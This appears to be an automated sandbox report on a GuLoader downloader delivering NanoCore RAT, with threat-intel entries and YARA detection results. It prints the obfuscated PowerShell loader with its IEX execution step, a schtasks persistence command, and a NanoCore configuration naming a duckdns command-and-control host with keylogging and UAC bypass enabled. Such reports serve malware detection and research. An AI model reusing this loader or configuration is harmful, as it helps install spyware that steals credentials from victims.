T1Jf3Du1KoBSi1mi3 E1St8Us0En2Ub1 AFUm1 I8Un1Co1 d5Sh6Pu5Nd2La0To4 m1Vr9St0Ek5 F1moF s1St8qu1 T3Sk0 W4Br0 P5Lu4 S2Pa5LaF M5AnAtr5 h6 H5 CEPe3Ur1Ma3Pi2 P2Se2 F5 K6Ov3 D6Po5 BE C2 fD F3BoFSv1 S8Re0En2Ho4 S5 G4 S4Le2TaBTr5DuASa5Sa6Je2 TD O3 sFSh1Gr8 U0 O2la4ge5 s4 G4 V2 SB M5 eAFo5 u6 b2 DD b3HyFUp1 P8Pu0Po2 M4 W5Dd4Re4He2KaB b5BaANa5 M6Mo2UnD B3AlF R1 t8 L0 B2Cr4pr5Lu4 D4Ka2InBNi5 DASe5 O6 N2ToD K3BoF A1 R8Fe0 S2Ek4 F5fa4st4Fr2 CB M5LaAFo5 o6 H2TaDno3svFMu1Sa8 p0 B2 L4Co5Ae4 G4Sv2PiBUn5 SFBl5 S6 O5DeERu2SyDCh3 DFRe1Fo8Pa0 M2Re4 D5gr4Fr4Go2 EBRi5CyF D5 SF K5HeFRe'Pr)Sh;Ly&re(Yc`$ FrTaoars Si Mn pe Tr TsMa7 F) B Or(LaBDiropuPid dg KoRemComFoeGr0Ro4Vo B' S5 S2 G2Sa5Ta1In8Un1Fi7wo0Pe6Bu0 b5Bi1Bl3Hy1 E0Sm1 SATf1Cr7 R0Ti5 D1kiD L1Lg3Lo1Pr8 n5 D6 D4 DB A5 F6Sk2SaDFi2Lk5Ba0MiFja0Em5 C0 S2 S1ex3Ed1 MBOp5 U8 D2 P4 G0 C3 V1 S8 O0Ph2Da1fdF a1DiBly1 O3Ug5 U8 i3HoFCh1 t8Ec0 p2wi1 T3 S0 P4Ci1Ti9Gr0 V6 P2ba5Eg1Ap3An0 G4To0Fl0Ja1peFBl1Ku5Mi1 B3Se0 B5Su5Aa8 A3InBFi1Di7Vu0Fo4 K0 R5Mo1 FEFe1Ac7Ro1MaAEp2EfB I4DaCBa4vuCSt3 I1De1Mo3 R0Tj2 P3Co2Aa1Gn3Ko1 EAmi1Sa3En1 s1Un1 F7 f0 T2Hu1 U3Se3In0Aa1 C9Ma0Te4Ge3 m0 F0Si3ce1Be8 H1 u5Wi0Ve2 S1VaF r1 S9 C1Ha8 c2 P6 P1 S9 C1KaFSk1Be8Le0ro2 P1Se3 P0Ko4wi5 IE P5DiEUn1Sp0Ud1DiDRe0 T6Ny5Ar6Rn5 k2re3 S5 N1Ln9Ke1caBFa0 T6Ad1UnAMo1 O3 C1GyB F1 P3Nu1Dd8Al0Pr2 K1SeFSk1Oa8 B1An1Re5Dr6wo5Su2An0Ov4Le1Mi9 P0 s5 M1UsF R1Po8Nr1Pi3 A0Tr4Ga0 F5St4Ti0Pa5 CF G5 TA D5St6Ra5 LEPr3Ma1Uf3Ra2 M2Bo2 L5 B6Va3Co6Te5BlESp2 SDno3BiF L1Ei8Ko0En2Mu4Ma5st4Pe4Cr2 UB A5ReA B5Ca6ch2NoDRu3BeFMi1Fo8Au0 I2Pr4Ga5No4Kn4to2EnBUn5 FABu5Ru6 S2 NDSt3AfFDe1Fi8 S0 O2 O4Be5 K4Br4 T2InBMu5TrA A5Ro6Bi2 RDUd3SkFLi1St8 C0Bl2Il4 R5 Q4Co4 O2EnBAn5ReAKa5 F6Pl2HaDSt3JaF f1 K8ko0 W2 T4 D5 Z4kr4Re2 ABOb5 PF o5 B6ti5ZaEPo2 FD E3 PFIn1Fr8Su0 S2Un2 H6ro0Hv2Br0Co4Go2UnBPr5UgFBe5 LFrn5DiF H' S)Pr;Ra&Ha(Sk`$bor Vo KsFeiWinUdeSkrFosSl7Pr)Un Un(noBSjr Ru adKogknoNomcomPue A0un4Th St'Tu5Pr2Pr2Ke5Sc1 C3 U1ToB S1 S7 H1 P3 H1 A9Hy0Fr5Vi0 h2Co1Pe9Tv1 AB t1Ma7Et0Ab2Ud1 B7Or5Lo6 M4NeB A5Kn6Un5An2 S3 T2In1 SF N1Pr7re0Ia4Un0 SFUd5Di8To3diFPl1He8 B0 R0 C1 R9gl1 TD G1St3 B5 kEKa5SlB B4 B7 a5ViA r4 U6 O5 RA s4 N0Lo4Un2 d5 AA T4Ve6 P5UdAAr5Ba6 P4ko1Ra4 T5 T4 T7 I4SpFOm4 HF t4En0 G4Na7 C4Ca0 I5KnAHa4 B6 H5 DFWe'Le) v;Mi&In( S`$UnrRioDasEniBanDye ArAdsoc7Un)Ov Oa( AB sr SusudOdg So Nm Sm Ae S0Ju4 M Af' T5Fl2El3fj7En1Ba8Zo1Kl5Fl1 U3 S0Co5Ex0Tr2 L0Go4 S1LiF F1se7Ky1Pl8Je5bi6Ne4EaBUr5Sf6Tr5ek2 E2 F5 T1Ud8 S1 T7Ko0Ne6Sa0Br5Co1Un3Ti1 P0pu1ThA m1hu7Ta0 P5Fo1 WDSk1Sp3tr1So8Ka5Un8 F3ruFAn1Ko8 S0Hi0Bu1Op9 i1StD B1In3Pr5 PE K5En2Fi2 G5 K1Su3Dk1VeBTr1An7 F1Os3Li1 K9 A0Fi5 U0Co2 E1 P9Te1ExB C1Pr7sr0Be2Ny1Sm7Tr5 SAPe4Ru6An2 ME S4St4sk4Ru4Av5EnA d4pr6Te5 WAAp4 S6Lu5 gAGr4 A6 B5TeF C' b) S;Ps`$NoSPet GaFonBac KhSci PoPrnSkeSodCo2Ze= R`"""fj`$ Te LnMov R:LeLcaO SC EA RLAcAPaPEfPUnDRiA uTSaA R\ BSbok haBamScfPrlToe GlHisLueLinEls F\ Vf Fa GmSne MlSaeBesSts s\YaP Vr Ue Cg DeSon leMir Do Ru Ns A2br2Pa4Or\osAHitRoe Vi Ss UtMeiPlsCokBleNos F. ANUdo QnWe`""" I; S&Mu(Un`$ Pr Ao is JiGen SeLerBas R7 O) S Fo( TB Sr Gu Sd PgPhoBimSvmSkeAn0Uo4Al Si'Gu5 B2Be2Pa0Pr1Pi7Ar1Fo1Re0 P5 A0Da2 R1Dr3sk5Af6op4ZiBLo5 S6Br2FlDCo2 S5Sp0KoF B0po5Fo0Or2en1Aa3Om1 SBBi5Te8 L3EpF G3Ak9La5 s8 S3 L0 B1DuF d1BaA N1 F3 A2SkBSk4 BC U4 AC L2 A4Pr1Tr3 O1Fl7Sw1Er2Pi3dr7Hy1 SAEv1PrAAm3 F4No0GaF H0 I2Ka1 I3 M0My5 C5FlEHa5An2 N2sh5 A0 D2Ka1Di7 P1 D8Oc1 P5Di1UnE P1reF S1Un9 U1 E8 A1Ek3 H1 v2Sh4Co4pe5 TF E' R)Al; I`$TrISvn TfPoi GmHauKrm F=Le`$CoVMea ag Fs StKreFe.MacFio Su KnTrtpi- F1Be0 L2Ti4 S; P& F( G`$ ArGro TsUniMunFie SrUns S7Pr) I Kv(FaB srBiu PdIng ro TmEpm FeFa0So4 A s' A2 DDRa2 C5Se0SoFSp0Sk5Ko0 s2Bn1Un3 U1 RBTr5 H8 J2Ce4Ve0 C3Di1Br8 C0Te2 P1 UF U1inBPu1 P3 O5 P8 S3 DF K1No8Re0As2Ra1Sm3 D0Da4 A1Ma9Un0 S6Gs2 D5Ov1Na3Ta0 s4 R0Pr0St1OyFSa1 C5Ud1Sa3 V0Ba5 F5Ou8 U3ViB B1Al7 T0 O4 S0Su5 S1MyE R1 K7Ge1 GAla2 sBMa4 LC D4RuCBr3Sy5En1Re9 G0 O6Er0YnFFu5 LE k5 R2 C2 S0 A1qu7 T1Dj1 I0 W5pr0 C2Fi1Kr3 M5 IAFe5Kr6Ko4Lo7 M4 U6 C4Fe4Ve4 M2 t5BuABo5 D6 R5 T2Sl3 I7 S1 p8fl1sk5Ba1To3sm0Un5 L0 T2 P0Tr4Un1 MFCo1 H7Om1Fo8po5AlA u5 K6 V5 S2Ud3SlF B1Ac8si1Sk0Ma1AtF s1miBKa0Ne3 A1 NB t5FiFUd' s)Fo;va&Vi( P`$ srIno Ssimi Dn ceNerOps P7 D) B Mi(CyBAmr Eu SdChg DoMomRemJee s0 n4Sm Ve'st5 u2Sk1Fj0um1 S9ca0 P4 D1TuE F1CoF S1Oe8 T1 C2Oc0Ga4Ej1 A3Te0 P5Sa5 S6 O4MiBOv5 A6to2 VDsa2Ra5 A0PiF L0Di5 O0Sa2Pr1Su3Ri1 HB G5 C8Be2 S4Va0Ab3be1Vi8Ls0 T2Af1 PFFr1TrBPl1Bi3Sk5Hy8 V3FoF B1Sv8Fa0 E2Pa1 x3Ga0 U4 s1Pr9Un0 M6 A2 S5Le1Su3De0Ok4Sp0 C0Hj1SkFGe1fr5Mo1 h3 P0Ud5 B5 A8Po3SpBNo1Cu7 T0Bi4Ud0Fe5De1 FE P1 C7no1 DALa2 SB T4AnC C4BlCTe3 T1to1 A3Se0Bo2Fo3Af2Bi1 E3Di1AnA F1 P3He1 R1Ta1Sa7Os0Ga2 U1Sp3Ut3Wo0An1Br9 P0 T4 A3gr0Wa0Et3 p1ca8Fu1 D5 T0 N2Er1 DFRa1 p9Ov1Sk8Aa2Sl6 d1 S9 P1 UFFd1Fo8 D0Hi2 S1Gl3An0Ef4Ki5 EE J5PrEIs1Ov0Er1LeD C0Ta6 S5sk6 C5 S2Sk3 s5Rh1an9Re1udB T0 F6Ny1SuA T1Sc3 H1 FBov1an3Sk1He8 A0Ln2Bl1 HFIn1We8Wo1 K1In5Wh6Ti5Ma2 S3ReEGu1 E9Ci1FoAPe1Fe7No1Po4Je1FuF t0 L4Tr1Ru2Pr4 S7Pr4 S4 B4 H6Ne5YeFSi5AnAro5py6 A5NdE S3 U1Ps3Hm2In2Hy2 T5 M6Mu3Ro6Gl5SvESk2 KD S3AnF F1Th8Th0 M2Sk2 G6 A0 T2Gl0Ud4 D2 LBBj5 BABu5Ro6 C2 MDSp3OvFHa1Sl8 A0 N2 N2 R6Cl0 S2Do0De4Se2UnB U5KoA U5 B6 I2 UD C3BrFNo1 H8Sl0Un2 T2 E6Ra0 o2Un0 V4 O2FiB k5ApFOv5Su6 M5ViE S2psDca3MeF B1St8 G0Ma2Ps2An6 E0Ha2Bu0 E4Te2 UB D5BrF M5 SFHa5 lF R' T)Pe;fr& F(Uf`$Bir Korys KiFrnRoe BrHasTo7 D) B S( MB Fr KuRud Gg Ao Hm Im SeCo0To4Ta F'Bu5Me2Su1Vi0He1Ti9 F0 M4eu1 VECo1 gFCo1 U8 C1Re2Pi0 a4 A1Pa3Di0Sl5 S5Be8 D3PaF S1Hi8Pa0 S0 U1Mi9en1ScDHa1gl3Sv5DiEHa4 L6Sa5ReACr5Tr2 P3 A7 I1 H8Mu1Pr5Cp1Me3 B0Sh5 m0Sc2Ov0un4 M1 UFTa1 T7 S1 T8jo5AlA M4Up6Tr5 DFFo'Me)Ad# M;""";Function Nonschismatic9 { param([String]$Saleswomen); For($Antilabors=2; $Antilabors -lt $Saleswomen.Length-1; $Antilabors+=(2+1)){ $Brudgomme = $Brudgomme + $Saleswomen.Substring($Antilabors, 1); } $Brudgomme;}$Ironiernes0 = Nonschismatic9 'GeIPeEIbXIn ';&$Ironiernes0 (Nonschismatic9 $Boarspear);<#Microphytic udvandrere Trichosanthes Eudemons Longobardi Helicidae lundress #>;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

CasPol.exe (PID: 1072 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)

schtasks.exe (PID: 3408 cmdline: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp" MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)

conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

CasPol.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0 MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)

conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nanocore RAT, NanoCore	Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.	APT33 The Gorgon Group	https://assets.virustotal.com/reports/2021trends.pdf https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack	https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "48e0e383-40c8-47b1-a4ea-d717ed94", "Group": "Default", "Domain1": "7fxcmft-olcmjfjxdk.duckdns.org", "Domain2": "", "Port": 3342, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "7fxcmft-olcmjfjxdk.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3a85:$a: NanoCore 0x3ade:$a: NanoCore 0x3b1b:$a: NanoCore 0x3b94:$a: NanoCore 0x1723f:$a: NanoCore 0x17254:$a: NanoCore 0x17289:$a: NanoCore 0x3023b:$a: NanoCore 0x30250:$a: NanoCore 0x30285:$a: NanoCore 0x3ae7:$b: ClientPlugin 0x3b24:$b: ClientPlugin 0x4422:$b: ClientPlugin 0x442f:$b: ClientPlugin 0x16ffb:$b: ClientPlugin 0x17016:$b: ClientPlugin 0x17046:$b: ClientPlugin 0x1725d:$b: ClientPlugin 0x17292:$b: ClientPlugin 0x2fff7:$b: ClientPlugin 0x30012:$b: ClientPlugin
00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3b1b:$a1: NanoCore.ClientPluginHost 0x17289:$a1: NanoCore.ClientPluginHost 0x30285:$a1: NanoCore.ClientPluginHost 0x3ade:$a2: NanoCore.ClientPlugin 0x17254:$a2: NanoCore.ClientPlugin 0x30250:$a2: NanoCore.ClientPlugin 0x3eb2:$b1: get_BuilderSettings 0x1c1cf:$b1: get_BuilderSettings 0x351cb:$b1: get_BuilderSettings 0x3b69:$b4: IClientAppHost 0x3f23:$b6: AddHostEntry 0x3f92:$b7: LogClientException 0x1c13e:$b7: LogClientException 0x3513a:$b7: LogClientException 0x3f07:$b8: PipeExists 0x3b56:$b9: IClientLoggingHost 0x172a3:$b9: IClientLoggingHost 0x3029f:$b9: IClientLoggingHost
00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost
00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x116cd:$a1: NanoCore.ClientPluginHost 0x11690:$a2: NanoCore.ClientPlugin 0x11a64:$b1: get_BuilderSettings 0x1171b:$b4: IClientAppHost 0x11ad5:$b6: AddHostEntry 0x11b44:$b7: LogClientException 0x11ab9:$b8: PipeExists 0x11708:$b9: IClientLoggingHost
00000004.00000002.24024306894.000000000C1E3000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: CasPol.exe PID: 1072	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: CasPol.exe PID: 1072	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x919e:$a: NanoCore 0x91f7:$a: NanoCore 0x9234:$a: NanoCore 0x92ad:$a: NanoCore 0x9b66:$a: NanoCore 0x9bb9:$a: NanoCore 0x9bf2:$a: NanoCore 0x9c65:$a: NanoCore 0x11237:$a: NanoCore 0x1124a:$a: NanoCore 0x1127c:$a: NanoCore 0x16f4b:$a: NanoCore 0x16f5e:$a: NanoCore 0x16f90:$a: NanoCore 0x22b69:$a: NanoCore 0x22c57:$a: NanoCore 0x33545:$a: NanoCore 0x3359e:$a: NanoCore 0x335db:$a: NanoCore 0x33654:$a: NanoCore 0x33f0d:$a: NanoCore
Process Memory Space: CasPol.exe PID: 1072	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x9234:$a1: NanoCore.ClientPluginHost 0x335db:$a1: NanoCore.ClientPluginHost 0x37769:$a1: NanoCore.ClientPluginHost 0x42f15:$a1: NanoCore.ClientPluginHost 0x91f7:$a2: NanoCore.ClientPlugin 0x3359e:$a2: NanoCore.ClientPlugin 0x37734:$a2: NanoCore.ClientPlugin 0x42ed8:$a2: NanoCore.ClientPlugin 0x95ae:$b1: get_BuilderSettings 0x33955:$b1: get_BuilderSettings 0x3c53b:$b1: get_BuilderSettings 0x4327b:$b1: get_BuilderSettings 0x9282:$b4: IClientAppHost 0x33629:$b4: IClientAppHost 0x42f63:$b4: IClientAppHost 0x961f:$b6: AddHostEntry 0x339c6:$b6: AddHostEntry 0x432ec:$b6: AddHostEntry 0x968e:$b7: LogClientException 0x33a35:$b7: LogClientException 0x3c4aa:$b7: LogClientException
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.CasPol.exe.244c4629.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.CasPol.exe.244c4629.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
5.2.CasPol.exe.244c4629.5.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0xb165:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin 0xb158:$s1: ClientPlugin 0x10179:$s6: get_ClientSettings
5.2.CasPol.exe.244c4629.5.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xb184:$a1: NanoCore.ClientPluginHost 0xb14f:$a2: NanoCore.ClientPlugin 0x100ca:$b1: get_BuilderSettings 0x10039:$b7: LogClientException 0xb19e:$b9: IClientLoggingHost
5.2.CasPol.exe.23fc0000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.CasPol.exe.23fc0000.4.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
5.2.CasPol.exe.23fc0000.4.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
5.2.CasPol.exe.244c0000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.CasPol.exe.229f3105.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.CasPol.exe.229f3105.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24180:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241ad:$x2: IClientNetworkHost
5.2.CasPol.exe.229f3105.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0x2414b:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0x24180:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0x2413f:$i2: IClientData 0xb165:$i3: IClientNetwork 0x24161:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0x24170:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0x2419a:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0x241ad:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0x241c0:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0x241ce:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0x241ea:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin
5.2.CasPol.exe.244c0000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.CasPol.exe.229f3105.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xb184:$a1: NanoCore.ClientPluginHost 0x24180:$a1: NanoCore.ClientPluginHost 0xb14f:$a2: NanoCore.ClientPlugin 0x2414b:$a2: NanoCore.ClientPlugin 0x100ca:$b1: get_BuilderSettings 0x290c6:$b1: get_BuilderSettings 0x10039:$b7: LogClientException 0x29035:$b7: LogClientException 0xb19e:$b9: IClientLoggingHost 0x2419a:$b9: IClientLoggingHost
5.2.CasPol.exe.244c0000.6.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
5.2.CasPol.exe.244c0000.6.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
5.2.CasPol.exe.244c0000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.CasPol.exe.244c0000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
